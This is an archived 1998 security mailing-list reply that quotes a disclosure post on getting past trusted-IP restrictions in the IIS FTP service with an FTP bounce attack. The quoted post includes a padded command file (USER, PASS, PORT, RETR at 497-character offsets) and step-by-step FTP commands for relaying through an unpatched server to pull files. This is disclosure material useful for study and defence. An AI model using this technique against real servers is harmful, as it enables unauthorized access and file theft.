Re: By-passing IIS ftp security
[
Date Prev][
Date Next][
Thread Prev][
Thread Next][
Date Index][
Thread Index]
Re: By-passing IIS ftp security
- To: NTBUGTRAQ
LISTSERV.NTBUGTRAQ.COM
- Subject: Re: By-passing IIS ftp security
- From: Andreas Klein <andreklMICROSOFT.COM>
- Date: Fri, 15 May 1998 00:11:44 -0700
- Comments: To: Nemo <mnemonixGLOBALNET.CO.UK>
- Reply-To: Andreas Klein <andreklMICROSOFT.COM>
- Sender: Windows NT BugTraq Mailing List <NTBUGTRAQLISTSERV.NTBUGTRAQ.COM>
IMHO this is not "bypassing the IIS ftp security" but relying on an
adminstrators fault....
a good scenario to be aware of though.
just my $0.02 worth.
ciao,
Andreas
-----Original Message-----
From: Nemo [mailto:mnemonixGLOBALNET.CO.UK]
Sent: Tuesday, May 12, 1998 7:20 AM
To: NTBUGTRAQLISTSERV.NTBUGTRAQ.COM
Subject: By-passing IIS ftp security
The Microsoft ftp service, as provided for by Internet Information Server
can be configured to allow connections from only certain ("trusted") IP
addresses. This paper describes how this security arrangement could be
by-passed depending on the configuration of the remote network. This is
based on a "bounce" attack but it is important to note that the target ft=
p
server does not have to have the registry setting "EnablePortAttack" set =
to
1; in other words the server doesn=92t have to be configured to allow an =
ftp
bounce attack. You do, however, need one ftp server that you run the boun=
ce
attack from. This server has to be included in the range of trusted IP
addresses. This will most likely be an unpatched UNIX server on the same
subnet as your target IIS server.
=A0
Basically you are using this server as a platform to log into the IIS
server and steal what files you can. The login process and other commands
are contained in a file called cmds.txt and are sent to the IIS server
using the ftp bounce attack. When a login occurs this way, because of
buffering the ftp service on IIS will read (or at least look for) a comma=
nd
every 497 characters after the first character of each command. So cmds.t=
xt
will begin with "user anonymous". 497 characters after the =91u=92 of use=
r IIS
will read the next command. These characters can be garbage.
=A0
USER ANONYMOUS
1234567890abcdefghijklmnopqrstuvwxyz1
1234567890abcdefghijklmnopqrstuvwxyz2
1234567890abcdefghijklmnopqrstuvwxyz3
1234567890abcdefghijklmnopqrstuvwxyz4
1234567890abcdefghijklmnopqrstuvwxyz5
1234567890abcdefghijklmnopqrstuvwxyz6
1234567890abcdefghijklmnopqrstuvwxyz7
1234567890abcdefghijklmnopqrstuvwxyz8
1234567890abcdefghijklmnopqrstuvwxyz9
1234567890abcdefghijklmnopqrstuvwxyz0
1234567890abcdefghijklmnopqrstuvwxyzA
1234567890abcdefghijklmnopqrstuvwxyzB
1234567890abcdefghijklmnopqPASS AHERE
1234567890abcdefghijklmnopqrstuvwxyz1
1234567890abcdefghijklmnopqrstuvwxyz2
1234567890abcdefghijklmnopqrstuvwxyz3
1234567890abcdefghijklmnopqrstuvwxyz4
1234567890abcdefghijklmnopqrstuvwxyz5
1234567890abcdefghijklmnopqrstuvwxyz6
1234567890abcdefghijklmnopqrstuvwxyz7
1234567890abcdefghijklmnopqrstuvwxyz8
1234567890abcdefghijklmnopqrstuvwxyz9
1234567890abcdefghijklmnopqrstuvwxyz0
1234567890abcdefghijklmnopqrstuvwxyzA
1234567890abcdefghijklmnopqrstuvwxyzB
1234567890abcdefghijklmnopqrstPORT 194,126,80,119,105,34
1234567890abcdefghijklmnopqrstuvwxyz1
1234567890abcdefghijklmnopqrstuvwxyz2
1234567890abcdefghijklmnopqrstuvwxyz3
1234567890abcdefghijklmnopqrstuvwxyz4
1234567890abcdefghijklmnopqrstuvwxyz5
1234567890abcdefghijklmnopqrstuvwxyz6
1234567890abcdefghijklmnopqrstuvwxyz7
1234567890abcdefghijklmnopqrstuvwxyz8
1234567890abcdefghijklmnopqrstuvwxyz9
1234567890abcdefghijklmnopqrstuvwxyz0
1234567890abcdefghijklmnopqrstuvwxyzA
1234567890abcdefghijklmnopqrstuvwxyzB
1234567890abcdvRETR FILE.TXT
1234567890-----=E0 more garbage
=A0
I have put the commands in upper case here so they stand out.
=A0
So here=92s how the attack would go :
Scenario:
HostA is a UNIX running an ftp service that has not been patched against
bounce attacks. You can log into this server anonymously and have write
permissions on at least one directory. HostA=92s IP address is
123.123.123.120
=A0
HostB is an NT server running IIS and allows anonymous connections but on=
ly
from IP addresses of the same subnet range eg 123.123.123.1 to
123.123.123.254. HostB has the IP address 123.123.123.123.
=A0
=A0
1.Connect to Host A, login and change to a directory where you have write
permission.
2.Issue the command "quote pasv". The server will respond saying it is
going into passive mode. Note the address and the port
(ADD,ADD,ADD,ADD,PORT,PORT). Enter this value into your cmds.txt file and
save it. Then issue the command "quote stor file.txt". The session will
appear to hang. In actual fact it is waiting patiently for someone to
connected to its port and send it file.txt.
3.Open another session with Host A. Change to the same directory and uplo=
ad
cmds.txt.=20
4.Now issue the command "quote port 123,123,123,123,0,21". This primes a
connection to the target IIS server.=20
5.Issue the command "quote retr cmds.txt". This causes HostA to make a
connection to HostB and after the 3-way TCP handshake the contents of
cmds.txt are transferred to HostB. HostB reads the first command USER
anonymous. It will reply saying, "Anonymous access allowed, send identity
(e-mail name) as password." But not that you=92ll see this. This message =
is
directed at HostB=92s TCP port 20 (ftpdata). 497 characters after the let=
ter
=91U=92 of user the IIS server will read the next command "PASS ahere". =
It
will reply "user anonymous logged in". Our next command (497 characters
after the =91P=92 of PASS) is PORT ADD,ADD,ADD,ADD,PORT,PORT. Note =96 Th=
is does
not go against the IIS ftp service=92s built in security mechanism that
disallows a PORT command if a different IP address to the clients is used.
This will then set up a connection to the waiting port on Host A that we
set up in step 1. Using the command "RETR file.txt" will then cause HostB
to send file.txt down to HostA and thus you have by-passed the security
setup.
Mnemonix
http://www.users.globalnet.co.uk/~mnemonix/index.html
<Picture>
